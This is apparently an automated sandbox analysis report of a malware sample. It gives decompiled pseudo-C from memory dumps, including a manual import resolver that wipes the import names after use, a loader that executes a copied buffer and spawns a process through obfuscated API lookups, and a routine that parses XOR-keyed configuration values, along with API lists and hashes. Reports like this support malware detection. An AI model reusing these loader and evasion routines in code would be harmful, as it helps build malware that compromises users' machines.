				_t82 =  *0x44bd1a0; // 0x0
				_t116 = 0;
				if(_t82 == 0) {
					L6:
					if(_t138 != 0) {
						L18:
						_t83 =  *0x44bd1a0; // 0x0
						_v48 = _t138;
						if(_t83 != 0) {
							_t116 =  *_t83(2,  &_v72);
						}
						if(_t116 != 0) {
							L32:
							 *_a8 = _t116;
							L33:
							_t85 =  *0x44bd1a0; // 0x0
							if(_t85 != 0) {
								_v40 = _v40 & 0x00000000;
								_v48 = _t138;
								_v44 = _t116;
								 *_t85(5,  &_v72);
							}
							return _t116;
						} else {
							if(_t139[5] == _t116 || _t139[7] == _t116) {
								L27:
								_t116 = GetProcAddress(_t138, _v52);
								if(_t116 == 0) {
									_v40 = GetLastError();
									_t90 =  *0x44bd19c; // 0x0
									if(_t90 != 0) {
										_t116 =  *_t90(4,  &_v72);
									}
									if(_t116 == 0) {
										_a4 =  &_v72;
										RaiseException(0xc06d007f, _t116, 1,  &_a4);
										_t116 = _v44;
									}
								}
								goto L32;
							} else {
								_t95 =  *((intOrPtr*)(_t138 + 0x3c)) + _t138;
								if( *_t95 == 0x4550 &&  *((intOrPtr*)(_t95 + 8)) == _v8 && _t138 ==  *((intOrPtr*)(_t95 + 0x34))) {
									_t116 =  *(_a4 + _v16);
									if(_t116 != 0) {
										goto L32;
									}
								}
								goto L27;
							}
						}
					}
					_t98 =  *0x44bd1a0; // 0x0
					if(_t98 == 0) {
						L9:
						_t138 = LoadLibraryA(_v60);
						if(_t138 != 0) {
							L13:
							if(InterlockedExchange(_v28, _t138) == _t138) {
								FreeLibrary(_t138);
							} else {
								if(_t139[6] != 0) {
									_t102 = LocalAlloc(0x40, 8);
									if(_t102 != 0) {
										 *(_t102 + 4) = _t139;
										_t125 =  *0x44bd198; // 0x0
										 *_t102 = _t125;
										 *0x44bd198 = _t102;
									}
								}
							}
							goto L18;
						}
						_v40 = GetLastError();
						_t104 =  *0x44bd19c; // 0x0
						if(_t104 == 0) {
							L12:
							_a8 =  &_v72;
							RaiseException(0xc06d007e, 0, 1,  &_a8);
							return _v44;
						}
						_t138 =  *_t104(3,  &_v72);
						if(_t138 != 0) {
							goto L13;
						}
						goto L12;
					}
					_t138 =  *_t98(1,  &_v72);
					if(_t138 != 0) {
						goto L13;
					}
					goto L9;
				}
				_t116 =  *_t82(0,  &_v72);
				if(_t116 != 0) {
					goto L33;
				}
				goto L6;
			}

0x044babc4
0x044babda
0x044babe0
0x044babe2
0x044babe7
0x044babed
0x044babf2
0x044babf5
0x044bac03
0x044bac0a
0x044bac0d
0x044bac10
0x044bac11
0x044bac14
0x044bac17
0x044bac1a
0x044bac1f
0x044bac2e
0x00000000
0x044bac34
0x044bac3e
0x044bac48
0x044bac4d
0x044bac4f
0x044bac59
0x044bac5c
0x044bac5f
0x044bac65
0x044bac67
0x044bac67
0x044bac6a
0x044bac6d
0x044bac72
0x044bac76
0x044bac89
0x044bac8b
0x044bad33
0x044bad33
0x044bad3a
0x044bad3d
0x044bad47
0x044bad47
0x044bad4b
0x044badc9
0x044badcc
0x044badce
0x044badce
0x044badd5
0x044badd7
0x044bade1
0x044bade4
0x044bade7
0x044bade7
0x00000000
0x044bad4d
0x044bad50
0x044bad7e
0x044bad88
0x044bad8c
0x044bad94
0x044bad97
0x044bad9e
0x044bada8
0x044bada8
0x044badac
0x044badb1
0x044badc0
0x044badc6
0x044badc6
0x044badac
0x00000000
0x044bad57
0x044bad5a
0x044bad62
0x044bad77
0x044bad7c
0x00000000
0x00000000
0x044bad7c
0x00000000
0x044bad62
0x044bad50
0x044bad4b
0x044bac91
0x044bac98
0x044baca8
0x044bacb1
0x044bacb5
0x044bacf8
0x044bad04
0x044bad2d
0x044bad06
0x044bad0a
0x044bad10
0x044bad18
0x044bad1a
0x044bad1d
0x044bad23
0x044bad25
0x044bad25
0x044bad18
0x044bad0a
0x00000000
0x044bad04
0x044bacbd
0x044bacc0
0x044bacc7
0x044bacd7
0x044bacda
0x044bacea
0x00000000
0x044bacf0
0x044bacd1
0x044bacd5
0x00000000
0x00000000
0x00000000
0x044bacd5
0x044baca2
0x044baca6
0x00000000
0x00000000
0x00000000
0x044baca6
0x044bac7f
0x044bac83
0x00000000
0x00000000
0x00000000

APIs

RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 044BAC2E
LoadLibraryA.KERNEL32(?), ref: 044BACAB
GetLastError.KERNEL32 ref: 044BACB7
RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 044BACEA

Strings

$, xrefs: 044BAC03

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: ExceptionRaise$ErrorLastLibraryLoad
String ID: $
API String ID: 948315288-3993045852
Opcode ID: 1fa6a5a807ec1f2c32f1e14442da4ae3004090cd2ecda8ae951238ee4666df08
Instruction ID: f1d91d7bea8c0a7a91a6c727d4c2ddcca11ae895a4254fa94d63cac1011b380c
Opcode Fuzzy Hash: 1fa6a5a807ec1f2c32f1e14442da4ae3004090cd2ecda8ae951238ee4666df08
Instruction Fuzzy Hash: BF812D75A006059FEF11CFA8D884AEEB7F9EB48311F14812EE545E7340EBB4E945CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 044B4118, Relevance: 15.1, APIs: 10, Instructions: 102
stringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E044B4118(void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, intOrPtr* _a16, intOrPtr* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				signed int _v20;
				void* __esi;
				intOrPtr _t42;
				intOrPtr _t44;
				void* _t46;
				void* _t47;
				void* _t48;
				int _t49;
				intOrPtr _t53;
				WCHAR* _t56;
				void* _t57;
				int _t58;
				intOrPtr _t64;
				void* _t69;
				intOrPtr* _t73;
				void* _t74;
				intOrPtr _t75;
				intOrPtr _t79;
				intOrPtr* _t85;
				intOrPtr _t88;

				_t74 = __ecx;
				_t79 =  *0x44bd33c; // 0x4d89bb8
				_v20 = 8;
				_v16 = GetTickCount();
				_t42 = E044B222E(_t74,  &_v16);
				_v12 = _t42;
				if(_t42 == 0) {
					_v12 = 0x44bc19c;
				}
				_t44 = E044B5E8C(_t79);
				_v8 = _t44;
				if(_t44 != 0) {
					_t85 = __imp__;
					_t46 =  *_t85(_v12, _t69);
					_t47 =  *_t85(_v8);
					_t48 =  *_t85(_a4);
					_t49 = lstrlenW(_a8);
					_t53 = E044B6D10(lstrlenW(0x44beb08) + _t48 + _t46 + _t46 + _t47 + _t49 + lstrlenW(0x44beb08) + _t48 + _t46 + _t46 + _t47 + _t49 + 2);
					_v16 = _t53;
					if(_t53 != 0) {
						_t75 =  *0x44bd2a4; // 0x8ca5a8
						_t73 =  *0x44bd11c; // 0x44ba9d7
						_t18 = _t75 + 0x44beb08; // 0x530025
						 *_t73(_t53, _t18, _v12, _v12, _a4, _v8, _a8);
						_t56 =  *_t85(_v8);
						_a8 = _t56;
						_t57 =  *_t85(_a4);
						_t58 = lstrlenW(_a12);
						_t88 = E044B6D10(lstrlenW(0x44bec28) + _a8 + _t57 + _t58 + lstrlenW(0x44bec28) + _a8 + _t57 + _t58 + 2);
						if(_t88 == 0) {
							E044B45B3(_v16);
						} else {
							_t64 =  *0x44bd2a4; // 0x8ca5a8
							_t31 = _t64 + 0x44bec28; // 0x73006d
							 *_t73(_t88, _t31, _a4, _v8, _a12);
							 *_a16 = _v16;
							_v20 = _v20 & 0x00000000;
							 *_a20 = _t88;
						}
					}
					E044B45B3(_v8);
				}
				return _v20;
			}

0x044b4118
0x044b4120
0x044b4126
0x044b4136
0x044b4139
0x044b413e
0x044b4143
0x044b4145
0x044b4145
0x044b414e
0x044b4153
0x044b4158
0x044b415e
0x044b4168
0x044b4171
0x044b4178
0x044b4186
0x044b4198
0x044b419d
0x044b41a2
0x044b41ab
0x044b41b4
0x044b41bd
0x044b41cb
0x044b41d3
0x044b41d8
0x044b41db
0x044b41e6
0x044b41fd
0x044b4201
0x044b4234
0x044b4203
0x044b4206
0x044b420e
0x044b4219
0x044b4221
0x044b4229
0x044b422d
0x044b422d
0x044b4201
0x044b423c
0x044b4241
0x044b4248

APIs

GetTickCount.KERNEL32 ref: 044B412D
lstrlen.KERNEL32(00000000,80000002), ref: 044B4168
lstrlen.KERNEL32(?), ref: 044B4171
lstrlen.KERNEL32(00000000), ref: 044B4178
lstrlenW.KERNEL32(80000002), ref: 044B4186
lstrlenW.KERNEL32(044BEB08), ref: 044B418F
lstrlen.KERNEL32(?), ref: 044B41D3
lstrlen.KERNEL32(?), ref: 044B41DB
lstrlenW.KERNEL32(?), ref: 044B41E6
lstrlenW.KERNEL32(044BEC28), ref: 044B41EF

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$CountFreeHeapTick
String ID:
API String ID: 2535036572-0
Opcode ID: 0d3cfea19955b75123257bce191b994eefdf72bc22bd63a687cc9e4296b31dd1
Instruction ID: b0379b32164f5841342b242577643bbd9ad975f1f27c734445e0334070dda886
Opcode Fuzzy Hash: 0d3cfea19955b75123257bce191b994eefdf72bc22bd63a687cc9e4296b31dd1
Instruction Fuzzy Hash: D1313976D00209AFDF01AFA5CC848DEBBB5EF48358B154456E944A7212DB35EA11DFE0

Uniqueness

Uniqueness Score: -1.00%

Function 00401D05, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104
librarystringloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401D05(intOrPtr* _a4, intOrPtr _a8) {
				signed int _v8;
				signed short _v12;
				struct HINSTANCE__* _v16;
				intOrPtr _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _t34;
				intOrPtr _t36;
				struct HINSTANCE__* _t37;
				intOrPtr _t40;
				CHAR* _t44;
				_Unknown_base(*)()* _t45;
				intOrPtr* _t52;
				intOrPtr _t53;
				signed short _t54;
				intOrPtr* _t57;
				signed short _t59;
				CHAR* _t60;
				CHAR* _t62;
				signed short* _t64;
				void* _t65;
				signed short _t72;

				_t34 =  *((intOrPtr*)(_a8 + 0x80));
				_v8 = _v8 & 0x00000000;
				_t52 = _a4;
				if(_t34 == 0) {
					L28:
					return _v8;
				}
				_t57 = _t34 + _t52;
				_t36 =  *((intOrPtr*)(_t57 + 0xc));
				_a4 = _t57;
				if(_t36 == 0) {
					L27:
					goto L28;
				}
				while(1) {
					_t62 = _t36 + _t52;
					_t37 = LoadLibraryA(_t62);
					_v16 = _t37;
					if(_t37 == 0) {
						break;
					}
					_v12 = _v12 & 0x00000000;
					memset(_t62, 0, lstrlenA(_t62));
					_t53 =  *_t57;
					_t40 =  *((intOrPtr*)(_t57 + 0x10));
					_t65 = _t65 + 0xc;
					if(_t53 != 0) {
						L6:
						_t64 = _t53 + _t52;
						_t54 =  *_t64;
						if(_t54 == 0) {
							L23:
							_t36 =  *((intOrPtr*)(_t57 + 0x20));
							_t57 = _t57 + 0x14;
							_a4 = _t57;
							if(_t36 != 0) {
								continue;
							}
							L26:
							goto L27;
						}
						_v20 = _t40 - _t64 + _t52;
						_t72 = _t54;
						L8:
						L8:
						if(_t72 < 0) {
							if(_t54 < _t52 || _t54 >=  *((intOrPtr*)(_a8 + 0x50)) + _t52) {
								_t59 = 0;
								_v12 =  *_t64 & 0x0000ffff;
							} else {
								_t59 = _t54;
							}
						} else {
							_t59 = _t54 + _t52;
						}
						_t20 = _t59 + 2; // 0x2
						_t44 = _t20;
						if(_t59 == 0) {
							_t44 = _v12 & 0x0000ffff;
						}
						_t45 = GetProcAddress(_v16, _t44);
						_v24 = _t45;
						if(_t45 == 0) {
							goto L21;
						}
						if(_t59 != 0) {
							_t60 = _t59 + 2;
							memset(_t60, 0, lstrlenA(_t60));
							_t65 = _t65 + 0xc;
						}
						 *(_v20 + _t64) = _v24;
						_t64 =  &(_t64[2]);
						_t54 =  *_t64;
						if(_t54 != 0) {
							goto L8;
						} else {
							L22:
							_t57 = _a4;
							goto L23;
						}
						L21:
						_v8 = 0x7f;
						goto L22;
					}
					_t53 = _t40;
					if(_t40 == 0) {
						goto L23;
					}
					goto L6;
				}
				_v8 = 0x7e;
				goto L26;
			}

0x00401d0e
0x00401d14
0x00401d19
0x00401d1e
0x00401e1f
0x00401e24
0x00401e24
0x00401d25
0x00401d28
0x00401d2b
0x00401d30
0x00401e1e
0x00000000
0x00401e1e
0x00401d37
0x00401d37
0x00401d3b
0x00401d41
0x00401d46
0x00000000
0x00000000
0x00401d4c
0x00401d5b
0x00401d60
0x00401d62
0x00401d65
0x00401d6a
0x00401d76
0x00401d76
0x00401d79
0x00401d7d
0x00401e03
0x00401e03
0x00401e06
0x00401e09
0x00401e0e
0x00000000
0x00000000
0x00401e1d
0x00000000
0x00401e1d
0x00401d87
0x00401d8a
0x00000000
0x00401d8c
0x00401d8c
0x00401d95
0x00401daa
0x00401dac
0x00401da3
0x00401da3
0x00401da3
0x00401d8e
0x00401d8e
0x00401d8e
0x00401daf
0x00401daf
0x00401db4
0x00401db6
0x00401db6
0x00401dbe
0x00401dc4
0x00401dc9
0x00000000
0x00000000
0x00401dcd
0x00401dcf
0x00401ddd
0x00401de2
0x00401de2
0x00401deb
0x00401dee
0x00401df1
0x00401df5
0x00000000
0x00401df7
0x00401e00
0x00401e00
0x00000000
0x00401e00
0x00401df9
0x00401df9
0x00000000
0x00401df9
0x00401d6c
0x00401d70
0x00000000
0x00000000
0x00000000
0x00401d70
0x00401e16
0x00000000

APIs

LoadLibraryA.KERNEL32(?,?,?,00000000,?,?), ref: 00401D3B
lstrlenA.KERNEL32(?), ref: 00401D51
memset.NTDLL ref: 00401D5B
GetProcAddress.KERNEL32(?,00000002), ref: 00401DBE
lstrlenA.KERNEL32(-00000002), ref: 00401DD3
memset.NTDLL ref: 00401DDD

Strings

~, xrefs: 00401E16

Memory Dump Source

Source File: 00000002.00000002.503256033.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.503287687.0000000000405000.00000040.00020000.sdmp Download File
Associated: 00000002.00000002.503307562.0000000000407000.00000040.00020000.sdmp Download File

Similarity

API ID: lstrlenmemset$AddressLibraryLoadProc
String ID: ~
API String ID: 1986585659-1707062198
Opcode ID: e93dc41b4db065e5ab19d4a61a588b4ef260d17e07312014414d1d32a21aa688
Instruction ID: cc31383138dc6bbcbcaadc8d890780aac7fc3a9c93ecf9e655efcab22f6e6fae
Opcode Fuzzy Hash: e93dc41b4db065e5ab19d4a61a588b4ef260d17e07312014414d1d32a21aa688
Instruction Fuzzy Hash: F0316F75A01206ABDB14CF55C890AAEB7B5AF85345F10407EEC05BB3A0D738EA45CB98

Uniqueness

Uniqueness Score: -1.00%

Function 044B49B7, Relevance: 12.1, APIs: 8, Instructions: 110
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 73%

			E044B49B7(void* __eax, void* __ecx) {
				long _v8;
				void* _v12;
				void* _v16;
				void* _v28;
				long _v32;
				void _v104;
				char _v108;
				long _t36;
				intOrPtr _t39;
				intOrPtr _t46;
				intOrPtr _t49;
				void* _t57;
				void* _t66;
				intOrPtr _t67;
				intOrPtr* _t68;
				intOrPtr* _t69;

				_t1 = __eax + 0x14; // 0x74183966
				_t67 =  *_t1;
				_t36 = E044B14E7(__ecx,  *(_t67 + 0xc),  &_v12,  &_v16);
				_v8 = _t36;
				if(_t36 != 0) {
					L12:
					return _v8;
				}
				memcpy(_v12,  *(_t67 + 8),  *(_t67 + 0xc));
				_t39 = _v12(_v12);
				_v8 = _t39;
				if(_t39 == 0 && ( *0x44bd260 & 0x00000001) != 0) {
					_v32 = 0;
					asm("stosd");
					asm("stosd");
					asm("stosd");
					_v108 = 0;
					memset( &_v104, 0, 0x40);
					_t46 =  *0x44bd2a4; // 0x8ca5a8
					_t18 = _t46 + 0x44be3e6; // 0x73797325
					_t66 = E044B67CF(_t18);
					if(_t66 == 0) {
						_v8 = 8;
					} else {
						_t49 =  *0x44bd2a4; // 0x8ca5a8
						_t19 = _t49 + 0x44be747; // 0x4d88cef
						_t20 = _t49 + 0x44be0af; // 0x4e52454b
						_t69 = GetProcAddress(GetModuleHandleA(_t20), _t19);
						if(_t69 == 0) {
							_v8 = 0x7f;
						} else {
							_v108 = 0x44;
							E044B3D1E();
							_t57 =  *_t69(0, _t66, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
							_push(1);
							E044B3D1E();
							if(_t57 == 0) {
								_v8 = GetLastError();
							} else {
								CloseHandle(_v28);
								CloseHandle(_v32);
							}
						}
						HeapFree( *0x44bd238, 0, _t66);
					}
				}
				_t68 = _v16;
				 *((intOrPtr*)(_t68 + 0x18))( *((intOrPtr*)(_t68 + 0x1c))( *_t68));
				E044B45B3(_t68);
				goto L12;
			}

0x044b49bf
0x044b49bf
0x044b49ce
0x044b49d5
0x044b49da
0x044b4aea
0x044b4af1
0x044b4af1
0x044b49e9
0x044b49f4
0x044b49f7
0x044b49fc
0x044b4a11
0x044b4a17
0x044b4a18
0x044b4a1b
0x044b4a21
0x044b4a24
0x044b4a29
0x044b4a31
0x044b4a3d
0x044b4a41
0x044b4ad1
0x044b4a47
0x044b4a47
0x044b4a4c
0x044b4a53
0x044b4a67
0x044b4a6b
0x044b4aba
0x044b4a6d
0x044b4a6e
0x044b4a75
0x044b4a8e
0x044b4a90
0x044b4a94
0x044b4a9b
0x044b4ab5
0x044b4a9d
0x044b4aa6
0x044b4aab
0x044b4aab
0x044b4a9b
0x044b4ac9
0x044b4ac9
0x044b4a41
0x044b4ad8
0x044b4ae1
0x044b4ae5
0x00000000

APIs

Part of subcall function 044B14E7: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,044B49D3,?,?,?,?,00000000,00000000), ref: 044B150C
Part of subcall function 044B14E7: GetProcAddress.KERNEL32(00000000,7243775A), ref: 044B152E
Part of subcall function 044B14E7: GetProcAddress.KERNEL32(00000000,614D775A), ref: 044B1544
Part of subcall function 044B14E7: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 044B155A
Part of subcall function 044B14E7: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 044B1570
Part of subcall function 044B14E7: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 044B1586

memcpy.NTDLL(?,?,?,?,?,?,?,00000000,00000000), ref: 044B49E9
memset.NTDLL ref: 044B4A24

Part of subcall function 044B67CF: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,?,59935A4D,044B52BB,73797325), ref: 044B67E0
Part of subcall function 044B67CF: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 044B67FA

GetModuleHandleA.KERNEL32(4E52454B,04D88CEF,73797325), ref: 044B4A5A
GetProcAddress.KERNEL32(00000000), ref: 044B4A61
HeapFree.KERNEL32(00000000,00000000), ref: 044B4AC9

Part of subcall function 044B3D1E: GetProcAddress.KERNEL32(36776F57,044B4521), ref: 044B3D39

CloseHandle.KERNEL32(00000000,00000001), ref: 044B4AA6
CloseHandle.KERNEL32(?), ref: 044B4AAB
GetLastError.KERNEL32(00000001), ref: 044B4AAF

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemcpymemset
String ID:
API String ID: 478747673-0
Opcode ID: 2abfca5636a192602b4188f09230ab18a50776b306c3333391378eebe9037def
Instruction ID: 53f313361076ff1c93a6a8657b68281ed4ac853c438298d9fbe38385ad67fffb
Opcode Fuzzy Hash: 2abfca5636a192602b4188f09230ab18a50776b306c3333391378eebe9037def
Instruction Fuzzy Hash: A6313FB2D00209AFEF10AFE5DC88DDEBBBCEB08304F11446AE645A7111D674AD55DBE0

Uniqueness

Uniqueness Score: -1.00%

Function 044B69CF, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 68
stringCOMMON

Download Yara Rule

C-Code - Quality: 64%

			E044B69CF(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _t9;
				intOrPtr _t13;
				char* _t28;
				void* _t33;
				void* _t34;
				char* _t36;
				intOrPtr* _t40;
				char* _t41;
				char* _t42;
				char* _t43;

				_t34 = __edx;
				_push(__ecx);
				_t9 =  *0x44bd2a4; // 0x8ca5a8
				_t1 = _t9 + 0x44be62c; // 0x253d7325
				_t36 = 0;
				_t28 = E044B2372(__ecx, _t1);
				if(_t28 != 0) {
					_t40 = __imp__;
					_t13 =  *_t40(_t28);
					_v8 = _t13;
					_t6 =  *_t40(_a4) + 1; // 0x4d895b1
					_t41 = E044B6D10(_v8 + _t6);
					if(_t41 != 0) {
						strcpy(_t41, _t28);
						_pop(_t33);
						__imp__(_t41, _a4);
						_t36 = E044B40C2(_t34, _t41, _a8);
						E044B45B3(_t41);
						_t42 = E044B6747(StrTrimA(_t36, "="), _t36);
						if(_t42 != 0) {
							E044B45B3(_t36);
							_t36 = _t42;
						}
						_t43 = E044B2070(_t36, _t33);
						if(_t43 != 0) {
							E044B45B3(_t36);
							_t36 = _t43;
						}
					}
					E044B45B3(_t28);
				}
				return _t36;
			}

0x044b69cf
0x044b69d2
0x044b69d3
0x044b69db
0x044b69e2
0x044b69e9
0x044b69ed
0x044b69f3
0x044b69fa
0x044b69ff
0x044b6a07
0x044b6a11
0x044b6a15
0x044b6a19
0x044b6a1f
0x044b6a24
0x044b6a34
0x044b6a36
0x044b6a4d
0x044b6a51
0x044b6a54
0x044b6a59
0x044b6a59
0x044b6a62
0x044b6a66
0x044b6a69
0x044b6a6e
0x044b6a6e
0x044b6a66
0x044b6a71
0x044b6a71
0x044b6a7c

APIs

Part of subcall function 044B2372: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,044B69E9,253D7325,00000000,00000000,00000000,?,?,044B88FB), ref: 044B23D9
Part of subcall function 044B2372: sprintf.NTDLL ref: 044B23FA

lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,00000000,?,?,044B88FB,?,04D895B0), ref: 044B69FA
lstrlen.KERNEL32(?,?,?,044B88FB,?,04D895B0), ref: 044B6A02

Part of subcall function 044B6D10: RtlAllocateHeap.NTDLL(00000000,-00000008,044B5D29), ref: 044B6D1C

strcpy.NTDLL ref: 044B6A19
lstrcat.KERNEL32(00000000,?), ref: 044B6A24

Part of subcall function 044B40C2: lstrlen.KERNEL32(?,?,044B88FB,044B88FB,00000001,00000000,00000000,?,044B6A33,00000000,044B88FB,?,?,044B88FB,?,04D895B0), ref: 044B40D9

Part of subcall function 044B45B3: HeapFree.KERNEL32(00000000,00000000,044B5DE9,00000000,?,?,-00000008), ref: 044B45BF

StrTrimA.SHLWAPI(00000000,=,00000000,00000000,044B88FB,?,?,044B88FB,?,04D895B0), ref: 044B6A41

Part of subcall function 044B6747: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,044B6A4D,00000000,?,?,044B88FB,?,04D895B0), ref: 044B6751
Part of subcall function 044B6747: _snprintf.NTDLL ref: 044B67AF

Strings

=, xrefs: 044B6A3B

Memory Dump Source

Source File: 00000002.00000002.504929898.00000000044B1000.00000020.00000001.sdmp, Offset: 044B0000, based on PE: true

Associated: 00000002.00000002.504923549.00000000044B0000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504944310.00000000044BC000.00000002.00000001.sdmp Download File
Associated: 00000002.00000002.504952185.00000000044BD000.00000004.00000001.sdmp Download File
Associated: 00000002.00000002.504963581.00000000044BF000.00000002.00000001.sdmp Download File

Similarity

API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
String ID: =
API String ID: 2864389247-1428090586
Opcode ID: 884247c2cf1ec420e803d15220b59a84ee700818b408216d8047c25469b5cc3a
Instruction ID: db24756ba0822dc6f6815104c91909a8cf07d66e8f7554b40d9e4f42574d435a
Opcode Fuzzy Hash: 884247c2cf1ec420e803d15220b59a84ee700818b408216d8047c25469b5cc3a
Instruction Fuzzy Hash: 35110673901525676E12BBB59C84DEF36ADDE89658306805BFA40A7202DE78FD0247F1

Uniqueness

Uniqueness Score: -1.00%

Function 044BA22C, Relevance: 9.2, APIs: 6, Instructions: 187
memoryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E044BA22C(void* __ebx, int* __ecx, void* __edi, void* __esi) {
				int _v8;
				void* _v12;
				signed int _t18;
				signed int _t23;
				void* _t28;
				char* _t29;
				char* _t30;
				char* _t31;
				char* _t32;
				char* _t33;
				void* _t34;
				void* _t35;
				signed int _t41;
				void* _t43;
				void* _t44;
				signed int _t46;
				signed int _t50;
				signed int _t54;
				signed int _t58;
				signed int _t62;
				signed int _t66;
				void* _t69;
				void* _t70;
				void* _t80;
				void* _t83;
				intOrPtr _t86;

				_t83 = __esi;
				_t80 = __edi;
				_t72 = __ecx;
				_t69 = __ebx;
				_push(__ecx);
				_push(__ecx);
				_t18 =  *0x44bd2a0; // 0x59935a40
				if(E044B1CEF( &_v12,  &_v8, _t18 ^ 0xb8bb0424) != 0 && _v8 >= 0x90) {
					 *0x44bd2d0 = _v12;
				}
				_t23 =  *0x44bd2a0; // 0x59935a40
				if(E044B1CEF( &_v12,  &_v8, _t23 ^ 0xd62287a1) == 0) {
					_t28 = 2;
					return _t28;
				} else {
					_push(_t69);
					_t70 = _v12;
					_push(_t83);
					_push(_t80);
					if(_t70 == 0) {
						_t29 = 0;
					} else {
						_t66 =  *0x44bd2a0; // 0x59935a40
						_t29 = E044B3D4D(_t72, _t70, _t66 ^ 0x48b4463f);
					}
					if(_t29 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t29, 0,  &_v8) != 0) {
							 *0x44bd240 = _v8;
						}
					}
					if(_t70 == 0) {
						_t30 = 0;
					} else {
						_t62 =  *0x44bd2a0; // 0x59935a40
						_t30 = E044B3D4D(_t72, _t70, _t62 ^ 0x11ba0dc3);
					}
					if(_t30 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t30, 0,  &_v8) != 0) {
							 *0x44bd244 = _v8;
						}
					}
					if(_t70 == 0) {
						_t31 = 0;
					} else {
						_t58 =  *0x44bd2a0; // 0x59935a40
						_t31 = E044B3D4D(_t72, _t70, _t58 ^ 0x01dd0365);
					}
					if(_t31 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x44bd248 = _v8;
						}
					}
					if(_t70 == 0) {
						_t32 = 0;
					} else {
						_t54 =  *0x44bd2a0; // 0x59935a40
						_t32 = E044B3D4D(_t72, _t70, _t54 ^ 0x3cf823ca);
					}
					if(_t32 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x44bd004 = _v8;
						}
					}
					if(_t70 == 0) {
						_t33 = 0;
					} else {
						_t50 =  *0x44bd2a0; // 0x59935a40
						_t33 = E044B3D4D(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x44bd02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x44bd2a0; // 0x59935a40
						_t34 = E044B3D4D(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E044B6555(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E044B6B92();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x44bd2a0; // 0x59935a40
						_t35 = E044B3D4D(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E044B6555(0, _t35) != 0) {
						_t86 =  *0x44bd324; // 0x4d895b0
						E044B4FDC(_t86 + 4, _t39);
					}
					HeapFree( *0x44bd238, 0, _t70);
					return 0;
				}
			}

0x044ba22c
0x044ba22c
0x044ba22c
0x044ba22c
0x044ba22f
0x044ba230
0x044ba231
0x044ba24b
0x044ba259
0x044ba259
0x044ba25e
0x044ba278
0x044ba407
0x044ba409
0x044ba27e
0x044ba27e
0x044ba27f
0x044ba282
0x044ba283
0x044ba288
0x044ba29e
0x044ba28a
0x044ba28a
0x044ba297
0x044ba297
0x044ba2a8
0x044ba2aa
0x044ba2b4
0x044ba2b9
0x044ba2b9
0x044ba2b4
0x044ba2c0
0x044ba2d6
0x044ba2c2
0x044ba2c2
0x044ba2cf
0x044ba2cf
